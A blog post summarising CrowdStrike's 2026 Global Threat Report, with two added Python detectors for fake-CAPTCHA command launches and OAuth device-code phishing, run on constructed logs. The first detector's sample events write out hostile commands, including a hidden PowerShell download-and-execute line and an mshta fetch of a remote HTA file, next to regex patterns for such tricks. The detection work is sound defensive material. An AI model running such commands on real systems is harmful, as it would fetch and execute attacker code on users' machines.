Key Findings – CrowdStrike 2026 Global Threat Report

Goran Lepan
March 24, 2026

CrowdStrike recently published its 2026 Global Threat Report, which examines how cyber threats are evolving. As AI agents autonomously write code, analyse data, orchestrate workflows and support decision-making, businesses are operating in a fundamentally different environment than they were a few years ago. This new agentic era, in which AI systems independently plan, reason and execute tasks at machine speed, is making every layer of business faster, more automated and increasingly interconnected.

Unfortunately, our organisations are not the only ones capitalising on this new era; our adversaries are too. AI-enabled attacks have increased rapidly, with the report highlighting an 89% year-on-year rise in AI-driven threat activity. AI enables cybercriminals to shorten the time between access and impact, accelerating lateral movement and significantly reducing the window for detection. What’s more, the attack surface has drastically expanded as the very AI systems that now underpin our businesses have become targets.

The Evolution of Modern Day Adversaries

The threat landscape is expanding in scale, increasing in speed and evolving in sophistication. CrowdStrike tracked 24 new adversaries in 2025, bringing the total to 281, highlighting a broader and more complex ecosystem of eCrime and state-linked actors operating globally.

Key findings from 2025 include:

  • Breakout time dropped to 29 minutes, down roughly 70% from 2021 levels
  • The fastest recorded breakout was just 27 seconds
  • 89% increase in attacks by AI-enabled adversaries
  • 82% of detections were malware-free, up from 51% in 2020
  • 35% of cloud incidents involved valid account abuse
  • 42% increase in zero-day vulnerabilities exploited prior to public disclosure
  • 37% rise in cloud-conscious intrusions, including a 266% increase by state-nexus actors
  • China-nexus activity increased 38% overall, with an 85% rise targeting logistics

The Growing Dominance of Interactive Intrusions

The continued rise of interactive intrusions was one of the defining themes in 2025. Rather than relying on traditional malware, adversaries increasingly favoured direct, human-driven attacks. Using legitimate credentials, native administrative tools and trusted software, threat actors blended into normal user behaviour while moving laterally across environments.

This shift to adversaries operating without obvious malicious files makes detection significantly more difficult, and the change was felt across many different industries. Technology remained the most frequently targeted sector (23%), followed by manufacturing (15%), retail (12%) and financial services (11%).

Three trends in particular illustrate this shift toward more evasive, human-driven attacks:

  • CHATTY SPIDER: This eCrime group illustrated the speed of modern interactive intrusions, moving from initial access to attempted data exfiltration in just four minutes using legitimate remote-access tools.
  • Fake CAPTCHA: Criminal actors increasingly use fake CAPTCHA lures, a bogus "verification" page that instructs the victim to paste a command into the Run dialog or a terminal, to get users to execute malicious code themselves. Such incidents surged by 563% in 2025, reflecting a shift toward more convincing, socially engineered delivery methods.
  • Big game hunting dominates eCrime: Big game hunting (BGH) groups continue to drive high-impact ransomware operations. After a slower start to 2025, activity rebounded in the second half of the year, with spam volumes rising 141% and rising cryptocurrency prices amplifying extortion incentives.

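The fake CAPTCHA pattern above leaves a recognisable trace in endpoint telemetry: whatever the victim pastes into the Run dialog is launched as a child of explorer.exe, and the command almost always carries a download-and-execute or hidden-window argument. The detector below is an added example written for this post, not CrowdStrike's code or a Falcon rule; the field names loosely follow Sysmon Event ID 1 (ProcessCreate), the interpreter list and argument patterns are assumptions, and every event is constructed.

```python
"""Heuristic detector for the fake-CAPTCHA ("ClickFix") execution pattern.

Added example for this post, not CrowdStrike's code. The lure tells the victim
to press Win+R and paste a command, so the tell-tale is explorer.exe (the
parent of anything launched from the Run dialog) spawning a script interpreter
with download-and-execute or hidden-window arguments. Field names loosely
follow Sysmon Event ID 1 (ProcessCreate); all records below are constructed.
"""
import re
from dataclasses import dataclass

# Interpreters the lure typically drives through the Run dialog (assumption).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Argument features that make an interactive launch worth alerting on (assumption).
SUSPICIOUS_ARGS = {
    "hidden window":     re.compile(r"-(?:w|windowstyle)\s+hidden", re.I),
    "encoded command":   re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "invoke-expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "web download":      re.compile(r"\b(?:downloadstring|invoke-webrequest|iwr|curl)\b", re.I),
    "remote URL":        re.compile(r"https?://", re.I),
    "HTA payload":       re.compile(r"\.hta\b", re.I),
}


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str
    user: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> list[str]:
    """Return the reasons an event looks like a Run-dialog ClickFix launch.

    Both conditions must hold to alert: the interpreter was started directly by
    explorer.exe (not by a terminal, IDE or scheduled task), and the arguments
    carry at least one download/evasion feature. Either alone is too noisy.
    """
    if _basename(ev.image) not in INTERPRETERS:
        return []
    if _basename(ev.parent_image) != "explorer.exe":
        return []
    return [name for name, pat in SUSPICIOUS_ARGS.items()
            if pat.search(ev.command_line)]


def detect(events: list[ProcessEvent]) -> list[tuple[int, list[str]]]:
    """Index every event that should raise an alert, with its reasons."""
    return [(i, r) for i, ev in enumerate(events) if (r := score_event(ev))]


# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -c "iex (iwr https://example.invalid/verify).Content"',
                 "CORP\\alice"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta https://example.invalid/captcha.hta", "CORP\\bob"),
    ProcessEvent(r"C:\Program Files\WindowsApps\WindowsTerminal.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -NoLogo", "CORP\\carol"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd /c ipconfig /all", "CORP\\dave"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
                 "notepad readme.txt", "CORP\\erin"),
]

if __name__ == "__main__":
    for idx, reasons in detect(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"ALERT {ev.user}: {_basename(ev.image)} <- explorer.exe; {', '.join(reasons)}")
```

Only the first two constructed events alert: the PowerShell launched from a terminal, the plain `ipconfig` run from the Run dialog and the notepad launch all fall through, which is the point of requiring both the explorer.exe parent and a suspicious argument rather than either alone.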
Key Adversary Themes

Across 2025, CrowdStrike observed a threat landscape shaped by speed, scale and trust abuse. The themes below summarise how adversaries are adapting and who is driving the activity:

  • Leveraging AI to enhance and accelerate operations: In 2025, both eCrime and state-nexus groups integrated AI into social engineering and technical operations, scaling existing attack methods rather than creating entirely new ones. FAMOUS CHOLLIMA, for example, used GenAI to generate fake personas for fraudulent employment schemes. Attacks by AI-enabled adversaries rose 89% YoY, reflecting increased speed and volume.
  • Expanding ransomware operations: Ransomware actors continued shifting away from monitored endpoints toward cross-domain blind spots across identity, SaaS and virtualisation. SCATTERED SPIDER used help desk social engineering to gain access and deployed ransomware primarily on VMware ESXi, minimising endpoint visibility.
  • Targeting network perimeter devices: China-nexus groups prioritised VPNs, firewalls and other edge devices for initial access, often establishing persistence on the device before pivoting deeper into environments. WARP PANDA exemplified this approach, rapidly exploiting newly disclosed perimeter vulnerabilities.
  • Compromising supply chains: Threat actors increasingly abused trust in software providers and third-party dependencies to bypass traditional controls. PRESSURE CHOLLIMA’s compromise of Safe{Wallet} to redirect funds from Bybit marked the largest crypto theft in history.
  • Weaponising zero-day vulnerabilities: Zero-day exploitation increased 42% YoY, with rapid weaponisation defining 2025 activity. China-nexus actors operationalised exploits within days of disclosure, while GRACEFUL SPIDER repeatedly leveraged zero-days in large-scale campaigns.
  • Subverting trust in cloud platforms and services: Cloud-conscious intrusions rose 37% YoY, including a 266% increase among named state-nexus actors. Techniques focused on identity and legitimate authentication flows. COZY BEAR, for example, used OAuth device-code phishing, in which the victim enters an attacker-obtained code on Microsoft's genuine device-login page, so the lure never has to leave Microsoft's authentic infrastructure and no spoofed login domain is needed.

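Because device-code phishing rides on legitimate authentication flows, the signal is not a bad domain but an unusual use of a legitimate grant: a device-code sign-in by an application the tenant never uses that way, or tokens redeemed from an address the user has never signed in from. The script below is an added example written for this post, not CrowdStrike's or Microsoft's code; the record fields are loosely modelled on Entra ID sign-in logs (an assumption, as is the `deviceCode` protocol value), the app allowlist is invented for the example, and the heuristic assumes the logged IP is that of the client that redeemed the code, which in a phish is the attacker's host.

```python
"""Flag OAuth device-code sign-ins that look like device-code phishing.

Added example for this post, not CrowdStrike's or Microsoft's code. In a
device-code phish the attacker requests a device code, the victim enters it at
the provider's genuine device-login page, and the attacker's client redeems the
resulting tokens. The records below are constructed and loosely modelled on
Entra ID sign-in log fields (assumption); the heuristic assumes the logged IP
is that of the client that redeemed the code, i.e. the attacker's host.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class SignIn:
    ts: str          # ISO-8601 timestamp
    user: str
    app: str         # application display name
    protocol: str    # "deviceCode" for the device authorization grant
    ip: str
    result: str      # "success" or an error string


# Apps this (constructed) tenant permits to use the device-code flow, e.g. for
# headless CLI logins. Everything else using the flow is suspect. Assumption.
ALLOWED_DEVICE_CODE_APPS = {"Microsoft Azure CLI"}


def baseline_ips(signins):
    """Source IPs each user has successfully used in non-device-code sign-ins."""
    base = defaultdict(set)
    for s in signins:
        if s.protocol != "deviceCode" and s.result == "success":
            base[s.user].add(s.ip)
    return base


def find_suspicious_device_code(signins, allowed_apps=ALLOWED_DEVICE_CODE_APPS):
    """Return (sign-in, reasons) for successful device-code grants that either
    come from a non-allowlisted app or land at an IP the user has never used
    interactively. A legitimate CLI login from the user's own workstation
    triggers neither condition."""
    base = baseline_ips(signins)
    hits = []
    for s in signins:
        if s.protocol != "deviceCode" or s.result != "success":
            continue
        reasons = []
        if s.app not in allowed_apps:
            reasons.append(f"device-code flow used by non-allowlisted app '{s.app}'")
        if s.ip not in base[s.user]:
            reasons.append(f"tokens redeemed from {s.ip}, never seen for {s.user} "
                           "in interactive sign-ins")
        if reasons:
            hits.append((s, reasons))
    return hits


# Constructed sample sign-in records (not real logs).
SAMPLE_SIGNINS = [
    SignIn("2025-06-02T08:01:00Z", "alice", "Office 365", "interactive", "203.0.113.10", "success"),
    SignIn("2025-06-02T08:14:00Z", "alice", "Microsoft Office", "deviceCode", "198.51.100.7", "success"),
    SignIn("2025-06-02T09:00:00Z", "bob", "Office 365", "interactive", "203.0.113.20", "success"),
    SignIn("2025-06-02T09:05:00Z", "bob", "Microsoft Azure CLI", "deviceCode", "203.0.113.20", "success"),
    SignIn("2025-06-02T09:30:00Z", "carol", "Microsoft Office", "deviceCode", "198.51.100.9", "failure"),
]

if __name__ == "__main__":
    for s, reasons in find_suspicious_device_code(SAMPLE_SIGNINS):
        print(f"ALERT {s.ts} {s.user}: " + "; ".join(reasons))
```

In the constructed data only alice's sign-in alerts, on both counts: Bob's device-code login is from an allowlisted CLI at the same address as his interactive sessions, and Carol's attempt never succeeded. In a real tenant the allowlist and the baseline should come from Conditional Access policy and a longer history than a single day's records.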
Countering the Threat Landscape

The 2026 Global Threat Report makes clear that today’s adversaries are faster, more evasive and increasingly cross-domain. AI is accelerating attack speed, zero-days are being weaponised rapidly, ransomware groups are exploiting blind spots, and cloud and identity systems are becoming primary targets.

For organisations, this means less time to detect, more surfaces to defend and greater reliance on proactive security. The report emphasises the need for unified visibility across endpoints, cloud and identity, rapid patching of internet-facing systems, stronger identity protection, and continuous monitoring capable of detecting lateral movement and credential abuse in real time.

Ultimately, security must evolve at the same pace as the threats it faces. Organisations that prioritise intelligence-led, cross-domain defence will be best positioned to counter the accelerating risk landscape.

If you would like to read the full report, you can download it here.